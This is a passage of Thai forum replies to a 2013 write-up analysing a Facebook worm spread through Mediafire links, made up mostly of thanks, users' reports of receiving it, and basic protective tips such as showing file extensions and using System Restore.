ขอบคุณอีกรอบ   :wanwan017:



หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: maxjame5432 ที่ 07 พฤษภาคม 2013, 01:19:45
ผมโชคดีเพราะอยู่กับไวรัสมาบ้างละ (ไม่ใช่คนเลี้ยงนะโดนทั้งนั้น  :P) ก็เลยต้องระวังทุกครั้งเลย ผมนี้โดนส่งมาตลอดส่งมาแบบว่า 30 นาทีมาครั้งนึง บางครั้ง 10 นาทีก็ส่งมา บล็อกมันซะลเย(พอดีไม่รู้จักกันด้วย  :-[)


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Azzy ที่ 07 พฤษภาคม 2013, 01:24:00
ขอบคุณค่ะ ยังไม่เคยเจอแฮะตัวนี้


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: pongpiya ที่ 07 พฤษภาคม 2013, 01:25:40
ขอบคุณความรู้ดีดีครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: mayaseven ที่ 07 พฤษภาคม 2013, 01:34:31
ใช้ครับทำ Network Analysis

สงสัยนิดนึงอะครับ อยากรู้ว่า ทำยังไงถึงรู้ว่ามันส่ง irc หรอครับ ใช้ wireshark จับดูใช่ปะครับ หรือว่ามีวิธีอื่นครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: jarusarun ที่ 07 พฤษภาคม 2013, 01:44:18
  :P ร้ายจริงวิธีนี้


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: proundly ที่ 07 พฤษภาคม 2013, 01:53:08
 :wanwan017:  เขียนบทความอ่านสนุกดีครับ  แถมได้ประโยชน์



หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: mayaseven ที่ 07 พฤษภาคม 2013, 02:03:53
ผมเข้าใจว่าน่าจะเป็น Premium Account ถึง Direct link ให้ Download แบบนั้นได้ครับ

ผมอยากทราบว่ามันเข้าไปอยู่ใน Mediafire ได้อย่างไรครับ แสดงว่า Mediafire โดนแล้วหรอกครับ แล้วทำไมเขาไม่จัดการลบมันออก คิดแล้วก็สงสัย


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: billygun ที่ 07 พฤษภาคม 2013, 02:35:57
ความรู้ทั้งนั้น :'(


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: pink-roof ที่ 07 พฤษภาคม 2013, 03:14:57
ขอบคุณค่ะ จขกท เก่งมากเลยค่ะ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: sassyoil ที่ 07 พฤษภาคม 2013, 06:33:30
ขอบคุณค่ะ มีประโยชน์มากๆ  :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: sevenr ที่ 07 พฤษภาคม 2013, 06:45:34
ขอบคุณครับ :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: VorX ที่ 07 พฤษภาคม 2013, 06:47:13
ขอบคุณครับ บวกให้แล้ว

เมื่อวานเพิ่งรับงานจากเพื่อนทางเฟซแบบไม่คิดอะไร แต่รอดไปไม่ใช่ไวรัส


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: patcharapong ที่ 07 พฤษภาคม 2013, 06:49:31
สุดยอดมากเลยครับ ขอบคุณสำหรับวิธีการแก้ครับผม   :wanwan017: :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: untitled ที่ 07 พฤษภาคม 2013, 06:53:30
ขอบคุณครับ  :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: gotrees ที่ 07 พฤษภาคม 2013, 07:34:23
แวะเข้ามาฟังครับ ขอบคุณครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: adidog ที่ 07 พฤษภาคม 2013, 07:59:44
เจ๋งมาก ชอบบทความแบบนี้ครับ +1 ให้เลย  :wanwan020: :wanwan020: :wanwan020:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: thaimakemoney ที่ 07 พฤษภาคม 2013, 08:25:16
ขอบคุณครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: jorjee001 ที่ 07 พฤษภาคม 2013, 08:44:51
สุดยอดมากครับ  นับถือ +1  :-[ :-[ :-[


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: hoke46 ที่ 07 พฤษภาคม 2013, 09:13:58
พอดีเห็นเขาแชร์กระทู้นี้ในเฟสเต็มเลยอ่ะ เลยตามมา


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Pay_6677 ที่ 07 พฤษภาคม 2013, 09:23:05
ขอบคุณครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: elevator ที่ 07 พฤษภาคม 2013, 09:27:29
ขอบคุณครับ :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: sanak ที่ 07 พฤษภาคม 2013, 10:02:19
ขอบคุณครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: mahatang ที่ 07 พฤษภาคม 2013, 10:10:25
สุดยอดเลยครับ เห็นแชร์กันเยอะอยู่


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: taedexde ที่ 07 พฤษภาคม 2013, 10:34:00
เกือบโดนเกมือนกัน  :wanwan009:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: KaPong_Inter ที่ 07 พฤษภาคม 2013, 10:43:23
 :wanwan017: สุดยอดอ่ะ อธิบายได้มัน ดี


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: holidaytours ที่ 07 พฤษภาคม 2013, 11:01:14
อธิบายละเอียดยิบเลย
ขอบคุณครับ
 :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: songwutk ที่ 07 พฤษภาคม 2013, 11:09:53
คนหัวโบราณที่ยังใช้ winxp อย่างผม

จะปิด option  "Hide extensions for known file types" และ เปิด "show hiden files and folders" เอาไว้ครับ


ไฟล์อะไรแปลกๆ มาจะสังเกตเห็นได้ง่าย


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: ptteppawong ที่ 07 พฤษภาคม 2013, 11:13:01
วิธีแก้ของผมง่าย  Sysyem Restore ไปยังวันก่อนที่จะโดนครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: nipolwil24191 ที่ 07 พฤษภาคม 2013, 13:02:59
เมื่อวานเพื่อนส่งมาให้เป็นของขวัญวันหยุดเล็กน้อย :wanwan044: ดีที่ตอนโหลดใช้ IDM เลยเห็นว่านามสกุลมาน .exe พ่วงท้าย (เพื่อนคนที่ส่งมีความรู้ด้านนี้อย่างมากก็เลยไม่คิดว่ามานจาโดนได้ ผมเลยกดรับรูปภาพจากมานซะ งานนี้ต้องขอบคุณ IDM ที่ชะลอเวลาในการ Save ลงเลยทำให้สังเกตเห็นความผิดปรกติ ไม่งั้นหล๊ะยาววว) :wanwan009:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: seo-1th ที่ 07 พฤษภาคม 2013, 13:04:32
ผมพึ่งด่ากลับไปเมื่อวาล
วันนี้ไม่เห็นใครส่งมาครับ
ฮ่าๆๆๆ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: nanjaow ที่ 07 พฤษภาคม 2013, 13:20:41
ตอนนี้ก็ยังมีเพื่อนใน FB ส่งมาบ้างประปราย...


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: kingphet11 ที่ 07 พฤษภาคม 2013, 13:25:17
ผมก็เจอเหมือนกัน


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: SEO [Aoom] ที่ 07 พฤษภาคม 2013, 13:26:54
ขอบคุณครับคามรู้


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Ga_Tuaw ที่ 07 พฤษภาคม 2013, 13:27:16
ผมก็เจอ   :wanwan015:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: JSampas ที่ 07 พฤษภาคม 2013, 16:07:08
(http://upic.me/i/zs/virusesorworm.png)
What the Fuck !!!!!!!


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Phi999 ที่ 07 พฤษภาคม 2013, 18:04:01
สังเกตุได้ว่า ที่ไหนเป็นสังคมใหญ่ นักพัฒนามัลแวร์ ก็พยายามอย่างยิ่งยวดที่จะเจอะเอาข้อมูลมาเยอะๆ เพื่อเอาไปใช้ในทางผิดๆ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: elmoro ที่ 07 พฤษภาคม 2013, 18:17:16
เสียชื่อ mediafire หมด ผมเข้าไปโหลดคลิปประจำยังไม่เหงจะเคยเจอไวรัสเรย  :-[


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: dsn10498 ที่ 07 พฤษภาคม 2013, 18:20:08
ไวรัสสมัยนี้พัฒนาไปเรื่อยเนอะครับเนอะ !   :wanwan044:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Venice ที่ 07 พฤษภาคม 2013, 18:48:04
ขอบคุณมากเลยครับ

 :-[


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: บักเชนนนน ที่ 07 พฤษภาคม 2013, 19:14:13
ผมเจอประจำ ไวรัสตัวนี้ ส่งมาเรื่อยๆด้วย

แต่ขอบคุณมากนะครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: mayaseven ที่ 07 พฤษภาคม 2013, 22:55:34
ผมกลับมานั้งอ่านบทความตัวเองพิมพ์ไปเยอะเลย สงสัยตอนเขียนง่วงนอนมาก ><" ผมได้แก้ไขแล้วในบทความต้นฉบับครับ สามารถเข้าไปอ่านได้ที่ http://www.mayaseven.com/2013/05/facebook-worm-analysis-mediafirecom.html ครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: soi62 ที่ 08 พฤษภาคม 2013, 10:04:33
เยี่ยมเลยครับ  ให้ความรู้กับหลายๆคนที่ยังไม่โดน ส่วนคนที่โดนแล้วเสียใจด้วยนะครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: muupandy ที่ 08 พฤษภาคม 2013, 10:31:55
 :wanwan017: ขอบคุณสำหรับความรู้ครับผม
ผมยังไม่เห็นมีเพื่อนส่งมาเลย แต่จะให้เพื่อน ๆ อ่านกันไว้ก่อน


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: meuudon ที่ 08 พฤษภาคม 2013, 10:46:42
ขอบคุณมากเลยครับ
  :wanwan020: :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: PAGE ที่ 08 พฤษภาคม 2013, 11:19:23
พวกนี้ว่างจริงๆ หาเรื่องระรานชาวบ้าน อิอิ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: maewlaay ที่ 08 พฤษภาคม 2013, 11:33:25
สุดยอดเลยครับ   :wanwan013:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: flash ที่ 08 พฤษภาคม 2013, 12:42:44
ละเอียดมากเลยครับ ต้องรีบตรวจสอบซะแล้ว


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Meetoo ที่ 08 พฤษภาคม 2013, 14:22:57
ขอบคุณครับ เคยเจอเพื่อนส่งมา สองครั้ง สองคน แต่ไม่ได้คลิกครับ กลัวเจอไวรัสนั่นแหละ  :wanwan008:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: phuchitz ที่ 08 พฤษภาคม 2013, 16:03:33
ขอบคุณมั่กๆครับ :(


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: deksamrong ที่ 08 พฤษภาคม 2013, 17:16:54
โหลดไม่ทันครับ เหมือนจะโดนลบไปแล้ว :P


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: iTrendy360 ที่ 09 พฤษภาคม 2013, 12:34:41
ขอบคุณค่ะ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: atzcret ที่ 09 พฤษภาคม 2013, 13:44:17
 :wanwan004:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: BesTZeroPlus ที่ 09 พฤษภาคม 2013, 14:00:19
ขอบคุณครับ :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: eammy ที่ 09 พฤษภาคม 2013, 14:09:09
เมื่อวานเจอไอ้นี่แหละ กวนทั้งวันค่ะ :wanwan015: :wanwan015: